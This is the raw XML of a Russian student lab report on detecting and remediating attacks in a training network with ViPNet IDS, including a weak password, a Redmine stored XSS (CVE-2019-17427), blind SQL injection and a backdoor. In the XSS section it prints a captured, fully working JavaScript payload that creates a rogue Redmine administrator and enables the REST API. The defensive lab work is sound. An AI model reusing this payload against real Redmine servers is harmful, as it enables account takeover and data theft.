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7.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId145.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId27.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId66.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId53.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId83.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId141.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId87.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId106.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId114.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId149.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId155.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId159.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId23.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId36.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId40.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId31.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId44.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId49.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId57.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId61.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId101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91.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId110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№1-С «ЗАЩИТА НАУЧНО-ТЕХНИЧЕСКОЙ ИНФОРМАЦИИ ПРЕДПРИЯТИЯ»</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Кибербезопасность предприятия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Александрова У.В.,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Волгин И.А,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Голощапов Я.В.,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дворкина Е.В.,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Серегина И.А.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Целью данной лабораторной работы является освоение практических навыков выявления, анализа и устранения уязвимостей информационных систем в рамках сценария «Защита научно-технической информации предприятия».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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Обнаружить, проанализировать и закрыть уязвимости:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Слабый пароль пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS (CVE-2019-17427);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Blind SQL (CVE-2019-18890).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Определить и устранить последствия эксплуатации уязвимостей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Developer backdoor (последствие уязвимости 1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Redmine User (последствие уязвимости 2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разработать и применить меры по устранению выявленных уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="теоретическое-введение"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Теоретическое введение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VipNet IDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Intrusion Detection System) — это система обнаружения вторжений для защиты информационных систем от несанкционированного доступа и атак. VipNet IDS предназначена для мониторинга сетевого трафика в реальном времени, выявления подозрительной активности, анализа сигнатур известных атак и аномального поведения, а также генерации оповещений и рекомендаций по реагированию. Система интегрируется с другими компонентами комплекса VipNet, обеспечивая многоуровневую защиту корпоративной инфраструктуры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Слабый пароль пользователя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— типичная проблема конфигурации, при которой используется легко угадываемый или стандартный пароль (например, «admin», «123456» и т.п.). Такая уязвимость позволяет злоумышленнику получить несанкционированный доступ к учётной записи и, как следствие, к системе в целом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS (межсайтовый скриптинг), CVE-2019-17427</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— уязвимость в веб-приложении Redmine, позволяющая внедрять вредоносный JavaScript-код в веб-страницы, просматриваемые другими пользователями. Эксплуатация этой уязвимости может привести к краже сессионных cookie, подмене контента или выполнению действий от имени жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection, CVE-2019-18890</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— уязвимость в Redmine, связанная с недостаточной фильтрацией пользовательского ввода, что позволяет злоумышленнику выполнять произвольные SQL-запросы к базе данных через слепые (blind) методы. Последствия включают извлечение, модификацию или удаление конфиденциальных данных, а также потенциальный выход за пределы приложения (например, выполнение команд ОС при определённых условиях).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Developer backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— наличие скрытого (часто не задокументированного) входа, оставленного разработчиком, может позволить злоумышленнику обойти стандартные механизмы аутентификации и получить полный контроль над системой.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Redmine User</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— компрометация учётной записи пользователя Redmine (например, через XSS или слабый пароль) даёт доступ к проектной документации, задачам, исходному коду и другим конфиденциальным данным, что особенно критично в контексте защиты научно-технической информации предприятия.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="164" w:name="выполнение-лабораторной-работы"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Выполнение лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="96" w:name="обнаружение-уязвимостей"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Обнаружение уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Уязвимости и последствия будут детектироваться в основном с помощью ViPNet IDS NS, далее записываться в карточки инцидентов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t xml:space="preserve">Для обнаружения актуальной подозрительной активности пользуемся фильтрами по дате, времени и важности (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-012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" w:name="fig-012"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="5101909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101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Установка фильтров</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="26"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="35" w:name="X211d3c06c0e7e3d1b798c475e8da7ad0abc520d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.1 Обнаружение уязвимости</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Слабый пароль пользователя”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">По сценарию нам известно, что</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутренний нарушитель подбирает пароль на файловый сервер и меняет существующий на сервере файл другим файлом с backdoor (дефектом алгоритма).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Пользователь Dev-1 загружает и запускает файл с backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутренний нарушитель получает контроль над компьютером пользователя Dev-1 и загружает скрипт для похищения учетных данных из браузера. Запускает данный скрипт, получает логин и пароль к Redmine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сначала было обнаружено сканирование системы и множество одинаковых событий со стороны 10.10.4.11 (узел менеджера) на 10.10.2.12 (файловый сервер), что может указывать на попытки подбора пароля. Далее Замечено событие класса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“successful-admin”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, которое указывает на то, что пользователь успешно вошел в систему, подобрав пароль (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-101">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Кроме того, видим действия между узлами 10.10.4.11, 10.10.2.12, 10.10.4.13 (Developer Workstation), которые также указывают, что был скомпрометирован пароль от компьютера Developer Workstation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">А в пакетах к этому событию увидим: Windows PowerShell running as user dev1 on DEV-ARM-01. Еще одно подтверждение.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101"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1951493"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="28" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/101.jpg" id="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51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Обнаружение входа в систему</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="30"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Заполним карточку инцидента. Так как пароль был подобран, то уязвимость - слабый пароль пользователя. Рекомендации по устранению - изменить пароль на более сложный (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-015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015"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2629067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290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Карточка инцидента</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="34"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="48" w:name="Xc762664b008c5671f21e7818fa0746047d573fe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.2 Обнаружение последствия</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Developer backdoor”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В последующих событиях можем видеть создание исполняемого файла на файловом сервере 10.10.2.12 и обращения к нему (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-013">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 4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013"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2043068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430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Детектирование создания неизвестного файла</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="39"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Также находим событие класса trojan-activity (LaZagne), указывающее на часть атаки, запускающую программу для извлечения информации из браузера (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-014">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LaZagne — это приложение с открытым исходным кодом, используемое для получения множества паролей, хранящихся на локальном компьютере</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[3]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014"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2027755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27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Обнаружение файла с backdoor</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="43"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Заполним карточку инцидента. Первичные рекомендации по устранению последствия - удаление исполняемого файла с backdoor и остановка его работы (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-01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016"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2673544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735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Карточка инцидента</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="47"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="65" w:name="X12a218674454f2c0851f2881a67219f5f238d88"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.3 Обнаружение уязвимости</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“XSS (CVE-2019-17427)”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутренний нарушитель проводит атаку stored XSS для включения на Redmine сервере REST API. Вредоносный код записывается на Wikiстраницу проекта Dev1. Получив доступ к консоли администратора, внутренний нарушитель создает нового пользователя Redmine с правами администратора.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Далее видим события с источником - 10.10.4.11 (предполагаемый нарушитель, менеджер), получателем - 10.10.2.15 (сервер Redmine, к нему по сценарию нарушитель получил доступ). Это события AM EXPLOIN Possible Redmine &lt;v4.0.4 XSS и событие AM EXPLOIT Generic Possible XSS in HTTP Body: они говорят о том, что эксплуатируется уязвимость Redmine, существующая в версиях до 4.0.4, позволяющая внедрять вредоносный JavaScript-код в веб-страницы, просматриваемые другими пользователями (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-017">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Также в пакетах к этому событию увидим:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /projects/dev1/wiki/Wiki/ HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: redmine.ampire.corp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: python-requests/2.31.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: multipart/form-data;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это http-запрос на сервер Redmine с отправкой формы с данными</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--8148d7a1c05d09d7c466c127bc05f0b7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Disposition: form-data; name="content[text]"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pre onfocusin="let xhr=new XMLHttpRequest;xhr.onreadystatechange=function(){if(4===xhr.readyState){doc=document.implementation.createHTMLDocument(''),doc.documentElement.innerHTML=xhr.responseText,value=doc.getElementsByName('authenticity_token');var e=encodeURIComponent(value[3].value);fetch('http://redmine.ampire.corp/users/',{method: 'POST', credentials: 'include', headers: {'Content-type':'application/x-www-form-urlencoded'}, body:'utf8=?&amp;authenticity_token='+e+'&amp;user[login]=hacker&amp;user[firstname]=hacker&amp;user[lastname]=hacker&amp;user[mail]=hacker%40hacker.ru&amp;user[language]=en&amp;user[admin]=0&amp;user[admin]=1&amp;user[password]=hackerhacker&amp;user[password_confirmation]=hackerhacker&amp;user[generate_password]=0&amp;user[must_change_passwd]=0&amp;user[mail_notification]=only_my_events&amp;user[notified_project_ids][]=&amp;pref[no_self_notified]=0&amp;pref[no_self_notified]=1&amp;pref[hide_mail]=0&amp;pref[hide_mail]=1&amp;pref[time_zone]=&amp;pref[comments_sorting]=asc&amp;pref[warn_on_leaving_unsaved]=0&amp;pref[warn_on_leaving_unsaved]=1&amp;continue=Create+and+continue'});let n=new XMLHttpRequest;var t='utf8=?&amp;authenticity_token='+e+'&amp;settings[rest_api_enabled]=0&amp;settings[rest_api_enabled]=1&amp;settings[jsonp_enabled]=0&amp;commit=Save';n.open('POST','http://redmine.ampire.corp/settings/edit?tab=api',!0),n.setRequestHeader('Content-type','application/x-www-form-urlencoded'),n.onreadystatechange=function(){4==n.readyState&amp;&amp;200==n.status&amp;&amp;console.log('Success!')},n.send(t)}},xhr.open('GET','http://redmine.ampire.corp/settings?tab=api'),xhr.send();" tabindex=1 style='height:1000px;width:1000px;' class=</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--8148d7a1c05d09d7c466c127bc05f0b7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Disposition: form-data; name="content[comments]"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--8148d7a1c05d09d7c466c127bc05f0b7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Disposition: form-data; name="commit"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Save</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--8148d7a1c05d09d7c466c127bc05f0b7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Disposition: form-data; name="attachments[dummy][file]"; filename=""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/octet-stream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">А это изменение кода и коммит с сохранением (Save) изменений в коде.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017"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2061622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61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Обнаружение эксплуатации уязвимости</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="52"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Также можем зайти через SSH подключение (работа в терминале) на сервер Redmine и проверить файл production.log (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/redmine-3.4.4/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat production log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-104">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). В этом файле увидим сильно отличающиеся от остальных этапы, говорящие о внедрении JS кода.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104"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2100262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104.jp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002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Обнаружение эксплуатации уязвимости через логи</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="56"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Составляем карточку уязвимости (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-018">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), общее описание и рекомендации можно найти на сайте AMTIP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[4]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-019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018"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2677248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772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Карточка уязвимости</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="6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4" w:name="fig-019"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1405805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05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Общее описание уязвимости</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="64"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="82" w:name="обнаружение-последствия-redmine-user"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
